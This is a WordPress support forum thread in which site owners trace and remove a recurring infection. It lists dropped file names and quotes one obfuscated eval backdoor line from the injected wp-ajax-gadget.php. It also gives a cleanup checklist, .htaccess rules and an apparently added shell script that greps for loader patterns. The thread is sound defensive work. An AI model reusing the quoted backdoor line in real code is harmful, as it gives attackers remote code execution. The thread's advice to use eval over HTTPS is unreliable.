• I’m hoping that someone can help me out on this. I have a site that files were added to. I had WP File Monitor added and it notified me that files were added to wp-includes/images and then a couple of files were changed. I removed them and then added WP Defender in the hopes that it would tell me if I had security setup wrong on a folder or something.

    WP Defender did find a couple of things but they were all very minor, low alerts. But whatever is going on, keeps happening. I will go through and remove/restore things and then in a day or so, they are all right back. Here is a list of the files added/changed from the WP File Monitor plugin. I’m hoping that someone here recognizes what this is and now I can fix my site to not let them in anymore.

    Files Changed:

    /wp-content/plugins/index.php
    /wp-includes/post-template.php

    Files Added:

    /wp-content/plugins/jquery-lightbox-for-native-galleries/wp-ajax-gadget.php
    /wp-content/plugins/wassup/zipper-class.php
    /wp-includes/images/list10.gif
    /wp-includes/images/list106.gif
    /wp-includes/images/list914.gif
    /wp-includes/images/list98.gif
    /wp-includes/images/nix156.doc
    /wp-includes/images/nix252.doc
    /wp-includes/images/nix380.doc
    /wp-includes/images/nix572.doc
    /wp-includes/images/nix580.doc
    /wp-includes/images/nix676.doc
    /wp-includes/images/nix732.doc
    /wp-includes/images/nix772.doc
    /wp-includes/images/nix828.doc
    /wp-includes/images/nix868.doc
    /wp-includes/images/pub281.jpg
    /wp-includes/images/pub377.jpg
    /wp-includes/images/pub608.doc
    /wp-includes/images/pub665.jpg
    /wp-includes/images/pub705.jpg
    /wp-includes/images/pub761.jpg
    /wp-includes/images/pub801.jpg
    /wp-includes/images/pub857.jpg
    /wp-includes/images/pub953.jpg
    /wp-includes/images/sched15.tar
    /wp-includes/images/sched734.gif
    /wp-includes/js/scriptaculous/query.js.php

    Has anyone else experienced this or have any idea what I can do to make this stop happening?

Viewing 15 replies - 46 through 60 (of 63 total)
  • WOW, what a hack, no wonder your hosting providers got problems, see the function name below (line 73 in wp-ajax-gadget.php). I really liked it, even though I am on the good side.

    $evil=create_function('$a',"\x72\x65tu\x72\x6e\x20\x65\x76\x61l(\x24a);");

    No wonder, hosting providers are confused, this is not a hack, this is an invasion.

    No wonder re-installation never worked. If I am right, they used and enhanced the F-ARMA hack technique. This hack is very smart, creating the hack dynamically from the database. The last place we or our defenders would check, isn’t it the data that we stored!!!!! No wonder it made all those people puzzled. I really hope I am wrong.

    But don’t worry, we will do it, I am all in.

    The following is a step by step solution checklist (some items might be true and applicable to you and others might not be, but you should complete it all, to prevent this problem from recurring) to remove and harden your WordPress:

    1. Check and Clear your WP-Database from rogue entries

    Now, you need to check your phpmyadmin, in the following order:

    Check all used WordPress databases for privileged users, both in the wp_users table and in the cPanel/MySQL users for that table, and make sure they match.

    Check the wp-options table for each used database by doing the following:
    Click on the wp_options table, which will allow you to browse the table contents.
    Use the phpMyAdmin search function, which you can access by clicking the Search tab at the top of the page.
    Search the option_name field for the following rogue database entries, and delete them when found:

    widget_generic_support

    ftp_credentials

    fwp

    wp_check_hash

    class_generic_support

    rss_% — In this case, delete all matches EXCEPT rss_language, rss_use_excerpt, and rss_excerpt_length (these are ok). Use the LIKE operator = rss.

    2. Remove Malicious Code and Files:

    Search your plugins folder for these two files, and delete them permanently: wp-ajax-gadget.php & zipper-class.php. Please note that you might find multiple instances of them, DELETE THEM ALL.

    Check all your PHP files for code lines at the header and the footer (even if there are too many lines, make sure you reach the last line); check for functions like eval(base64_decode, decode*). Remove them all. Refer to what timeuser found as an example. Start with the wp-includes folder. It may be a lengthy process, but that's because it's truly a smart hack.

    Check for directory names starting with a period; for example, Erko Risthein had wp-admin/includes/.svn/class-wp-theme-edit.php. This .svn is not a standard directory under includes, and additionally, directory names don’t start with a period; this one includes a file that needs to be checked, in case you find code as specified in the previous clause. DELETE FILES & FOLDERS.

    3. Hardening & Protecting your WP:

    Folder permissions should be 755, while FILES should be 644; as for timeuser and rsconsult, both their folder and file permissions are 755.
    Open the .htaccess, and ensure that the rewrite rules below are somewhere in your file. The purpose of these rewrite rules is to block any access to wp-includes files, the main back door discovered.
    If this helped you, you should give:

    Thanks to Erko Risthein & rsconsult for their contribution.

    Special thanks to timeuser, without whom this wouldn’t have been done.

    Regards.

    Step by Step Guide UPDATE: Step 4
    Note: This step complements the above mentioned steps.
    Important: All the above and following steps (1 TO 4) should be done sequentially with no time delay in between, to eliminate possible reproduction.

    4.1 WHAT?

    AJAX is not a single technology, it's a group of them; therefore, the proper securing of plug-ins utilizing it requires experience with these technologies collectively and not only one of them. AJAX makes interaction with users smoother and more responsive, and is highly recommended for consideration when YOU (not someone else) develop your own plugins or themes. However, it’s vital that AJAX is implemented correctly and securely, otherwise the consequence could be disastrous.

    4.2 WHY?

    To eliminate threats and harden AJAX handlers implemented by plugins utilizing AJAX technologies, because MOST plugin developers have a high focus on developing FUNCTIONAL plugins, and a very low focus on security. They seldom keep the balance to develop SECURE FUNCTIONAL plugins.

    4.3 WHERE?

    This applies to all your installed plugins (activated and deactivated) utilizing the AJAX technology. One of the very common uses of AJAX is forms plugins; however, all plugins utilizing AJAX will be scanned and dealt with accordingly. You can identify the answer immediately by reading the plugin description.

    4.4 HOW?

    4.4.1 If the plugin is NOT USED by your website, please DELETE it immediately. (This applies to activated and deactivated plugins not in use.)

    4.4.2 If the plugin is IN-USE and NOT A MUST TO USE, consider using a jQuery form plugin that utilizes the built-in WordPress jQuery Ajax submission handler, OR any other that satisfies your need.

    4.4.3 If the plugin is IN-USE and A MUST TO USE, then if you are:

    4.4.3.1 An experienced programmer, please review the plugin code and ensure that it implements the following tips:

    4.4.3.1.1 Use nonces and checks for permission
    4.4.3.1.2 Use admin-ajax.php to handle AJAX requests
    4.4.3.1.3 Use wp_localize_script() to declare JavaScript global variables
    4.4.3.1.4 Use “XMLHttpRequest” for JSON parsing over HTTP, ONLY USE “Eval” over HTTPS.

    4.4.3.2 An Intermediate programmer, you will have to wait for the detailed update that will be posted within a day or two.

    FOR ALL THREAD PARTICIPANTS.
    LET’S, AS A TEAM, DEVELOP A PROPER DOCUMENTED GUIDE FOR THIS DISASTROUS RECURRING PROBLEM AND SUBMIT IT TO WORDPRESS, AS OUR CONTRIBUTION.
    THEREFORE, FEEL FREE TO ADD, SUGGEST AND ENHANCE, TILL IT’S FINALIZED.
    As dear Erko mentioned, she submitted a ticket to WordPress Support, and she hasn’t received an answer yet.
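To make the file checks in steps 2 and 3.1 repeatable, here is an added POSIX shell triage script; it is not code from the thread or from any plugin named in it, it only lists findings for a human to review, and it assumes nothing beyond find, grep and sed. The sample tree it scans is constructed from the file names reported in this thread.

```shell
# Triage helper for steps 2 and 3.1 of the checklist above. Added example, not code
# from the thread: it reports the artefact classes the thread describes and deletes nothing.
# Usage: scan_wp_tree /path/to/wordpress   (prints findings; exit status 0 means none)
scan_wp_tree() {
  root="$1"; out="$(mktemp)"
  # Step 2: core never ships PHP inside these asset-only directories
  # (compare wp-includes/js/scriptaculous/query.js.php, wp-admin/css/edit-form-header.php).
  find "$root/wp-includes/images" "$root/wp-includes/js" "$root/wp-admin/css" \
       "$root/wp-admin/images" -type f -name '*.php' 2>/dev/null \
    | sed 's/^/stray-php: /' >> "$out"
  # Step 2: wp-includes/images holds only images; nix*.doc, sched*.tar etc. are drops.
  find "$root/wp-includes/images" -type f 2>/dev/null \
    | grep -v -E '\.(png|gif|jpe?g)$' | sed 's/^/odd-asset: /' >> "$out"
  # Step 2: PHP inside dot-directories such as wp-admin/includes/.svn/.
  find "$root" -type d -name '.*' ! -path "$root" 2>/dev/null \
    -exec find {} -type f -name '*.php' \; | sed 's/^/hidden-dir-php: /' >> "$out"
  # Step 2: injected loaders: eval() of a decoded string, or a create_function() body
  # spelled with \xNN escapes like the line quoted above from wp-ajax-gadget.php.
  pat='eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|str_rot13)'
  pat="$pat|create_function[[:space:]]*\([^)]*\\\\x[0-9a-fA-F]{2}"
  grep -rlE --include='*.php' "$pat" "$root" 2>/dev/null \
    | sed 's/^/injected-code: /' >> "$out"
  # Step 3.1: directories 755 and files 644 (the affected hosts had files at 755).
  find "$root" -type d ! -perm 755 2>/dev/null | sed 's/^/dir-not-755: /' >> "$out"
  find "$root" -type f ! -perm 644 2>/dev/null | sed 's/^/file-not-644: /' >> "$out"
  cat "$out"; n="$(wc -l < "$out" | tr -d ' ')"; rm -f "$out"
  [ "$n" -eq 0 ]
}

# Constructed sample tree (not a real site) using the file names reported in the thread.
build_sample_tree() {
  d="$(mktemp -d)"
  mkdir -p "$d/wp-includes/images" "$d/wp-includes/js/scriptaculous" \
           "$d/wp-admin/includes/.svn" "$d/wp-content/plugins/wassup"
  printf 'GIF89a' > "$d/wp-includes/images/list10.gif"
  printf 'drop'   > "$d/wp-includes/images/nix156.doc"
  printf '<?php echo 1;' > "$d/wp-includes/js/scriptaculous/query.js.php"
  printf '<?php echo 2;' > "$d/wp-admin/includes/.svn/class-wp-theme-edit.php"
  # Inert stand-ins that only reproduce the loader shape the grep looks for.
  printf '<?php $e=create_function("$a","\\x72\\x65turn 1;");' \
    > "$d/wp-content/plugins/wassup/zipper-class.php"
  printf '<?php /* core stub */\neval(base64_decode(""));' > "$d/wp-includes/post-template.php"
  find "$d" -type d -exec chmod 755 {} \;   # directories as they should be
  find "$d" -type f -exec chmod 755 {} \;   # files as the thread reported them: 755
  printf '%s' "$d"
}

SAMPLE="$(build_sample_tree)"
scan_wp_tree "$SAMPLE" || echo "== findings above: clean the site, then rerun =="; rm -rf "$SAMPLE"
```

Run it against a fresh copy of the site after each cleanup pass; a clean install of the same WordPress version should produce an empty report.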

    Thread Starter rsconsult

    (@rsconsult)

    Erko had submitted a request to Dreamhost – the hosting company, not WordPress.

    I plan on going through your steps above on all my sites today to try and get this eradicated. Luckily I have separated most of my sites so there shouldn’t be any reinfection to cleaned sites from sites I have not got to yet.

    Thank you Nihad Nagi and timeuser for working through this yesterday!

    Update: Step 3 (Rewrite rules were not mentioned above, sorry)

    3. Hardening & Protecting your WP:

    3.1 Folder permissions should be 755, while FILES should be 644; as for timeuser and rsconsult, both their folder and file permissions are 755.

    3.2 Open the .htaccess, and ensure that the rewrite rules below are somewhere in your file. The purpose of these rewrite rules is to block any access to wp-includes files, the main back door discovered.

    # Block the include-only files.
    RewriteEngine On
    RewriteBase /
    RewriteRule ^wp-admin/includes/ - [F,L]
    RewriteRule !^wp-includes/ - [S=3]
    RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
    RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
    RewriteRule ^wp-includes/theme-compat/ - [F,L]

    You are welcome RS. Thanks for the info.

    Thanks Nihad Nagi. Hopefully this has it all cleaned up AND stops this exploit from reoccurring.

    All the thanks is yours, timeuser.
    Note that we are in monitoring mode, to ensure the effectiveness of our solution.
    It’s been my pleasure.
    Regards

    Thread Starter rsconsult

    (@rsconsult)

    I have a fresh infected site to test this with. WP File Monitor just notified me of the following file changes:

    Files Changed:
    /wp-content/plugins/hello.php
    /wp-content/plugins/index.php
    /wp-includes/post-template.php

    Files Added:
    /wp-admin/css/edit-form-header.php
    /wp-admin/images/options-meta.php
    /wp-content/plugins/wordpress-file-monitor-plus/wp-ajax-gadget.php
    /wp-includes/https.php
    /wp-includes/images/list362.gif
    /wp-includes/images/nix212.doc
    /wp-includes/images/nix37.jpg
    /wp-includes/images/pub16.doc
    /wp-includes/images/pub440.doc
    /wp-includes/images/pub784.doc
    /wp-includes/images/sched158.gif
    /wp-includes/images/sched382.gif
    /wp-includes/theme-compat/class-https.php

    I have already deleted the Hello Dolly plugin. I apparently overlooked it when the site was setup. Site is running on the most current version of WordPress (3.3.1 at this time) and the following plugins:

    Akismet – v. 2.5.5
    Filter Posts in Pages – 2.1.4
    kStats Reloaded – 0.7.4
    WordPress Database Backup – 2.2.3
    WordPress File Monitor Plus – 1.4.1

    I’m in process of going through all the steps that were provided to clear this out. Will post back as I progress.

    -linda

    Thread Starter rsconsult

    (@rsconsult)

    Here is the code that was added to the wp-includes/post-template.php file – https://pastebin.com/AHC7LvDE

    Thread Starter rsconsult

    (@rsconsult)

    Ok, here are the notes from going through Nihad Nagi’s steps.

    Step #1 – none of those options were found in the database.

    Step #2 – Deleted the hello dolly plugin that was inadvertently left.
    Replaced wp-content/plugins/index.php with a clean version even though the file did not look to have been altered
    Restored an original wp-includes/post-template.php *See previous post to see what code had been added to this file
    Deleted all the files that were added per WP-File monitor as well as wp-content/plugins/kstats/zipper-class.php and wp-content/plugins/merlic-filter-posts/wp-ajax.gadget.php

    Step #3 – Changed permissions to all files under wp-includes and its subfolders to 644
    Added block on wp-includes files in .htaccess

    I think that is everything. *crossing fingers* that this works.

    I have fallen victim to the same hack…

    Though I have added the rewrite rules to .htaccess:

    https://pastebin.com/bGaVbea8

    But the same files made their way back to my folders:

    Timestamp: Mon, 26 Mar 2012 01:49:00 +0000

    Added:

    https://pastebin.com/bLYhevnT

    Tried to follow all the suggestions but never found any rogue entries in the database.

    Any ideas anyone?

    Vince

    I just noticed I had overlooked a file uploaded 05/06/11 called

    options-foot.php in /wp-admin/network/

    https://pastebin.com/AeetQgUb

    Could this be enough for re-entry?

    Regards,

    Vince

    Yes Vince, that’s why I emphasized that the steps should be done collectively and in sequence.
    Good luck

    To everyone,
    It’s been two weeks now, and from the quietness in this forum, I can conclude that so far so good.
    Regards to all.

    Thanks!

    I’ll keep an eye if anything pops back in after this clean up

  • The topic ‘Files being added to one of my sites’ is closed to new replies.